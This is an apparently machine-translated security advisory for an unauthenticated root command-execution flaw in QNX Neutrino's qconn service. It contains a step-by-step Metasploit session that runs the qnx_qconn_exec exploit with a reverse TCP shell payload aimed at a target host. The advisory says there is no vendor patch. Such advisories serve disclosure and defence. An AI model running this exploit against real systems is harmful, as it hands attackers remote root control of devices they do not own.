Release date:
Updated on:
Affected Systems:
QNX QCONN
Description:
--------------------------------------------------------------------------------
QNX Neutrino real-time operating system is a fully functional and stable operating system. Its modules can be flexibly increased or decreased to meet the limited requirements of real-time embedded system resources.
A security vulnerability exists in the qconn component of QNX Neutrino, which allows unauthenticated users to execute arbitrary commands as root users.
<* Source: David Odell
Link: http://www.metasploit.com/modules/exploit/unix/misc/qnx_qconn_exec
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
$ Msfconsole
#########
########################################
################################
######################################
##############################
######################################
##
Msf> use exploit/unix/misc/qnx_qconn_exec
Msf exploit (qnx_qconn_exec)> show payloads
Msf exploit (qnx_qconn_exec)> set PAYLOAD generic/shell_reverse_tcp
Msf exploit (qnx_qconn_exec)> set LHOST [my ip address]
Msf exploit (qnx_qconn_exec)> set RHOST [target ip]
Msf exploit (qnx_qconn_exec)> exploit
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
QNX
---
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.qnx.com/